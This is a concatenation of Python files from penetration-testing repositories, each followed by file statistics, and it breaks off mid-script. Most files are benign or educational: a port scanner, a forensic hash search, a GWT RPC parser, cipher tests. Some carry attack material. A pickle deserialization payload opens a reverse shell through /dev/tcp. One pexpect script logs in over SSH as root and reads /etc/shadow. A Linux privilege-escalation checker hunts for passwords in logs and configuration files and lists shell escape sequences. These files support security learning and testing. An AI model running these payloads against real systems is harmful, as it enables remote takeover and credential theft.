''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
handle = handles[stream_id]
attribute = wintypes.WORD(attr)
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
return _FillConsoleOutputAttribute(
handle, attribute, length, start, byref(num_written))
def SetConsoleTitle(title):
return _SetConsoleTitleW(title)
| 33.619355 | 111 | 0.644734 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22
b=44
c=55
d=None
if 22:
print("This will be printed -> if 22:")
if "hello":
print("This will be printed -> if 'hello':")
if -1:
print("This will be printed -> if -1")
if 0:
print("This would not be printed")
if d:
print("This will not be prined")
print("Lets Start with logical operators")
if a and b and c :
print("Printed -> if a and b and c:")
if a and b and c and d:
print("Not printed")
if a < b and a < c:
print("a is smaller than b and c -> without braces")
if (a < b) and (a <c) :
print("a is smaller than b and c -> with braces")
if a or b or c or d:
print("This is printed > if a or b or c or d :")
if not d:
print("Not of d will be printed as not None is True")
| 20.69697 | 54 | 0.632168 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
host = 'www.dvwa.co.uk'
ip = socket.gethostbyname(host)
openp = []
filterdp = []
common_ports = { 21, 22, 23, 25, 53, 69, 80, 88, 109, 110,
123, 137, 138, 139, 143, 156, 161, 389, 443,
445, 500, 546, 547, 587, 660, 995, 993, 2086,
2087, 2082, 2083, 3306, 8443, 10000
}
def is_up(ip):
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
def probe_port(ip, port, result = 1):
src_port = RandShort()
try:
p = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='F')
resp = sr1(p, timeout=2) # Sending packet
if str(type(resp)) == "<type 'NoneType'>":
result = 1
elif resp.haslayer(TCP):
if resp.getlayer(TCP).flags == 0x14:
result = 0
elif (int(resp.getlayer(ICMP).type)==3 and int(resp.getlayer(ICMP).code) in [1,2,3,9,10,13]):
result = 2
except Exception as e:
pass
return result
if __name__ == '__main__':
conf.verb = 0
if is_up(ip):
for port in common_ports:
print (port)
response = probe_port(ip, port)
if response == 1:
openp.append(port)
elif response == 2:
filterdp.append(port)
if len(openp) != 0:
print ("Possible Open or Filtered Ports:")
print (openp)
if len(filterdp) != 0:
print ("Possible Filtered Ports:")
print (filterdp)
if (len(openp) == 0) and (len(filterdp) == 0):
print ("Sorry, No open ports found.!!")
else:
print ("Host is Down")
| 26.84127 | 105 | 0.499715 |
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python HashSearch for MPE+
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Python Hashing Module
from sys import argv # Command Line arguments
# Import 3rd Party Modules
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Hash Search for MPE+ "
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "C:/SYN/HashSearch/FORENSIC_LOG.txt"
SRC_HASH = "C:/SYN/HashSearch/Hashes.txt"
CSV = "C:/SYN/HashSearch/results.csv"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this contstant to True if the SCRIPT_LOG
# should be overwritten, False if not
# End of Script Constants
# Initialize Forensic Logging
try:
# If LOG should be overwritten before
# each run, the remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print ("Failed to initialize Logging")
quit()
# End of Forensic Log Initialization
# Initialize CSV Output File
# Write Heading Line
try:
csvOut = open(CSV, "w")
csvOut.write("FileName, MD5 Hash, Match, Category \n")
except:
print ("Failed to initialize CSV File .. Make sure file is not open")
quit()
# Script Functions
'''
If you script will contain functions then insert them
here, before the execution of the main script. This
will ensure that the functions will be callable from
anywhere in your script
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
logging.warn("Event messages must be strings")
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
# Simple CSV Write Method
# Without Library Assist
def WriteCSV(fileName, MD5, match, category):
if match:
csvOut.write(fileName+","+MD5+","+ "*** YES ***"+","+category+"\n")
else:
csvOut.write(fileName+","+MD5+","+ " "+","+""+"\n")
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script it to provide an example
# script that demonstrate and leverage key capabilities
# of Python that provides direct value to the
# forensic investigator.
if __name__ == '__main__':
# Mark the starting time of the main loop
theStart = time.time()
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
LogEvent(LOG_INFO, argv + " Invalid Command line")
quit()
LogEvent(LOG_INFO,"Command Line Argument Vector")
LogEvent(LOG_INFO,"Script Name: " + scriptName)
LogEvent(LOG_INFO,"Script Path: " + path)
# Verify the path exists and determine
# the path type
LogEvent(LOG_INFO, "Processing Command Line")
if os.path.exists(path):
LogEvent(LOG_INFO,"Path Exists")
if os.path.isdir(path):
LogEvent(LOG_INFO,"Path is a directory")
else:
LogEvent(LOG_ERR, path + " is not a directory")
quit()
else:
LogEvent(LOG_ERR, path + " Does not exist")
quit()
LogEvent(LOG_INFO, "Reading Hash Values to Search from: "+SRC_HASH)
LogEvent(LOG_INFO, "Creating Dictionary of Hashes")
hashDict = {}
try:
with open(SRC_HASH) as srcHashes:
# for each line in the file extract the hash and id
# then store the result in a dictionary
# key, value pair
# in this case the hash is the key and id is the value
LogEvent(LOG_INFO, "Hashes included in Search")
LogEvent(LOG_INFO, "========== HASHES INCLUDED IN SEARCH ==========")
for eachLine in srcHashes:
if eachLine != "END":
lineList = eachLine.split()
if len(lineList) >= 2:
hashKey = lineList[0].upper()
hashValue = ""
for eachElement in lineList[1:]:
hashValue = hashValue + " " + str(eachElement)
# Strip the newline from the hashValue
hashValue = hashValue.strip()
# Add the key value pair to the dictionary
if hashKey not in hashDict:
hashDict[hashKey] = hashValue
LogEvent(LOG_INFO, hashKey+": "+hashValue)
else:
LogEvent(LOG_WARN, "Duplicate Hash Found: " + hashKey)
else:
# Not a valid entry, continue to next line
continue
else:
break
LogEvent(LOG_INFO, "========== END HASH SEARCH LIST ==========")
except:
LogEvent(LOG_ERR, "Failed to load Hash List: "+SRC_HASH)
LogEvent(LOG_INFO, "========== FILE SEARCH START ==========")
# Create Empty matchList and filesProcessed Count
matchList = []
filesProcessed = 0
# Now process all files in the directory provided
# Including all subdirectories
for root, subdirs, files in os.walk(path):
for curFile in files:
# Create the full pathName
fullPath = os.path.join(root, curFile)
# Generate the hash for the current file
# Default is to use MD5
hasher = hashlib.md5()
with open(fullPath, 'rb') as theTarget:
filesProcessed += 1
# Read the contents of the file and hash them
fileContents = theTarget.read()
hasher.update(fileContents)
# get the resulting hashdigest
hashDigest = hasher.hexdigest().upper()
# Now check for a hash match against the
# list we read in by checking the contents of the dictionary
if hashDigest in hashDict:
# If we find a match log the match and add the match to the matchList
matchDetails = hashDict[hashDigest]
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ curFile)
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ hashDigest)
LogEvent(LOG_CRIT, " CATEGORGY >> "+ matchDetails)
# add entry to match list
matchList.append([curFile, hashDigest, matchDetails])
# add entry to the csv file
WriteCSV(curFile,hashDigest,True, matchDetails)
else:
# if no match simply log the file and associated hash value
LogEvent(LOG_INFO, "File >> " + curFile + " MD5 >> " + hashDigest)
# add entry to csv file
WriteCSV(curFile,hashDigest,False, "")
# All files are processed
# close the CSV File for good measure
csvOut.close()
# Post the end of file search to the log
LogEvent(LOG_INFO, "========== FILE SEARCH END ==========")
# Once we process all the files
# Log the contents of the match list
# at the end of the log file
# If any matches were found create a summary at
# the end of the log
if matchList:
LogEvent(LOG_INFO, "")
LogEvent(LOG_CRIT, "==== Matched Hash Summary Start ====")
for eachItem in matchList:
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ eachItem[0])
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ eachItem[1])
LogEvent(LOG_CRIT, " CATEGORGY >> "+ eachItem[2])
LogEvent(LOG_CRIT, "==== Matched Hash Summary End ====")
# Record the End Time and calculate the elapsed time
theEnd = time.time()
elapsedTime = theEnd - theStart
# Log the number of Files Processed
# and the elapsed time
LogEvent(LOG_INFO, 'Files Processed: ' + str(filesProcessed))
LogEvent(LOG_INFO, 'Elapsed Time: ' + str(elapsedTime) + ' seconds')
# Now print the contents of the forensic log
with open(SCRIPT_LOG, 'r') as logData:
for eachLine in logData:
print(eachLine)
| 32.848485 | 104 | 0.560964 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# Takes two files on input. Tries to find every line of the second file within the first file
# and for every found match - extracts password value from the second file's line. Then prints these correlations.
#
# In other words:
#
# FileA:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c
#
# FileB - result of running hashcat:
# 68eacb97d86f0c4621fa2b0e17cabd8c:Test123
#
# WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
#
# Mariusz Banach / mgeeky
#
import sys, os
def main(argv):
if len(argv) < 3:
print('''
Usage: ./correlateCrackedHashes.py <fileWithUsernames> <crackedHashesFile> [delimiter]
<fileWithUsernames> - File containing usernames and their hashes (or just hashes)
<crackedHashesFile> - File being a result of running hashcat, in a form of hash:password
[delimiter] - (optional) Delimiter to be prepended to the usernames file line containing password
Default: comma
''')
return False
usernamesFile = argv[1]
crackedHashesFile = argv[2]
delimiter = ',' if len(argv) < 4 else argv[3]
if not os.path.isfile(usernamesFile):
print(f'[!] Usernames file does not exist: "{usernamesFile}')
return False
if not os.path.isfile(crackedHashesFile):
print(f'[!] Cracked passwords file does not exist: "{crackedHashesFile}')
return False
usernames = []
cracked = []
with open(usernamesFile) as f: usernames = [x.strip() for x in f.readlines()]
with open(crackedHashesFile) as f: cracked = [x.strip() for x in f.readlines()]
correlated = []
for crackedPass in cracked:
for user in usernames:
posOfLastColon = crackedPass.rfind(':')
hashValue = crackedPass[:posOfLastColon]
password = crackedPass[posOfLastColon+1:]
if hashValue in user:
print(delimiter.join([user, password]))
correlated.append(delimiter.join([user, password]))
if __name__ == "__main__":
main(sys.argv) | 31.846154 | 114 | 0.64761 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
ab = anonBrowser(proxies=[],\
user_agents=[('User-agent','superSecretBroswer')])
for attempt in range(1, 5):
ab.anonymize()
print '[*] Fetching page'
response = ab.open('http://kittenwar.com')
for cookie in ab.cookie_jar:
print cookie
| 22.785714 | 52 | 0.63253 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
PROMPT = ['# ', '>>> ', '> ','\$ ']
def send_command(child, cmd):
child.sendline(cmd)
child.expect(PROMPT)
print child.before
def connect(user, host, password):
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + user + '@' + host
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, ssh_newkey,\
'[P|p]assword:'])
if ret == 0:
print '[-] Error Connecting'
return
if ret == 1:
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT, \
'[P|p]assword:'])
if ret == 0:
print '[-] Error Connecting'
return
child.sendline(password)
child.expect(PROMPT)
return child
def main():
host = 'localhost'
user = 'root'
password = 'toor'
child = connect(user, host, password)
send_command(child, 'cat /etc/shadow | grep root')
if __name__ == '__main__':
main()
| 21.659574 | 63 | 0.528195 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCrossSiteScripting")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.181818 | 75 | 0.784375 |
Tricks-Web-Penetration-Tester | import pickle
import os
from base64 import b64decode,b64encode
class malicious(object):
def __reduce__(self):
return (os.system, ("/bin/bash -c \"/bin/sh -i >& /dev/tcp/ip/port 0>&1\"",))
ok = malicious()
ok_serialized = pickle.dumps(ok)
print(b64encode(ok_serialized))
| 22.75 | 85 | 0.672535 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
| 42.627451 | 111 | 0.764838 |
cybersecurity-penetration-testing | # Transposition Cipher Test
# http://inventwithpython.com/hacking (BSD Licensed)
import random, sys, transpositionEncrypt, transpositionDecrypt
def main():
random.seed(42) # set the random "seed" to a static value
for i in range(20): # run 20 tests
# Generate random messages to test.
# The message will have a random length:
message = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' * random.randint(4, 40)
# Convert the message string to a list to shuffle it.
message = list(message)
random.shuffle(message)
message = ''.join(message) # convert list to string
print('Test #%s: "%s..."' % (i+1, message[:50]))
# Check all possible keys for each message.
for key in range(1, len(message)):
encrypted = transpositionEncrypt.encryptMessage(key, message)
decrypted = transpositionDecrypt.decryptMessage(key, encrypted)
# If the decryption doesn't match the original message, display
# an error message and quit.
if message != decrypted:
print('Mismatch with key %s and message %s.' % (key, message))
print(decrypted)
sys.exit()
print('Transposition cipher test passed.')
# If transpositionTest.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 34.8 | 79 | 0.611461 |
Hands-On-Penetration-Testing-with-Python | from tweet_parser.tweet import Tweet
from tweet_parser.tweet_parser_errors import NotATweetError
import fileinput
import json
import sys
class twitter_parser:
def __init__(self,file_name):
self.file=file_name
def parse(self):
for line in fileinput.FileInput(self.file):
try:
tweet_dict = json.loads(line)
tweet = Tweet(tweet_dict)
except Exception as ex:
pass
print(tweet.all_text)
obj=twitter_parser(sys.argv[1])
obj.parse()
#"exp.json"
| 19.391304 | 59 | 0.726496 |
GWT-Penetration-Testing-Toolset | # -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
GwtParse v0.2
Copyright (C) 2010 Ron Gutierrez
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from optparse import OptionParser
from GWTParser import GWTParser
desc = "A tool for parsing GWT RPC Requests"
if __name__ == "__main__":
parser = OptionParser(usage='usage: %prog [options]', description=desc, version='%prog 0.10')
parser.add_option('-p', '--pretty', help="Output the GWT RPC Request in a human readible format", action="store_true")
parser.add_option('-s', '--surround', help="String used to surround all fuzzable values", action="store", dest="surround_value")
parser.add_option('-r', '--replace', help="String used to replace all fuzzable values", action="store", dest="replace_value")
parser.add_option('-b', '--burp', help="Generates Burp Intruder Output", default=False, action="store_true")
parser.add_option('-i', '--input', help="RPC Request Payload (Required)", action="store", dest="rpc_request")
parser.add_option('-w', '--write', help="Writes Fuzz String to a new output file", action="store" )
parser.add_option('-a', '--append', help="Appends Fuzz String to an existing output file", action="store" )
(options, args) = parser.parse_args()
if options.rpc_request:
if options.surround_value and options.replace_value and options.burp:
print( "\nCannot choose more then one output format.\n" )
parser.print_help()
exit()
if options.surround_value and options.replace_value:
print( "\nCannot choose more then one output format.\n" )
parser.print_help()
exit()
if options.surround_value and options.burp:
print( "\nCannot choose more then one output format.\n" )
parser.print_help()
exit()
if options.replace_value and options.burp:
print( "\nCannot choose more then one output format.\n" )
parser.print_help()
exit()
gwt = GWTParser()
if options.surround_value:
gwt.surround_value = options.surround_value
elif options.replace_value:
gwt.replace_value = options.replace_value
elif options.burp:
gwt.burp = options.burp
if options.write:
if os.path.exists(options.write):
print( "Output file entered already exists" )
exit()
fout = open( options.write, "w" )
gwt.fout = fout
elif options.append:
fout = open( options.append, "a" )
gwt.fout = fout
gwt.deserialize( options.rpc_request )
if options.pretty:
gwt.display()
gwt.get_fuzzstr()
if gwt.fout:
gwt.fout.close()
else:
print( "\nMissing RPC Request Payload\n" )
parser.print_help()
| 35.864078 | 133 | 0.582982 |
Penetration-Testing-Study-Notes | #!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
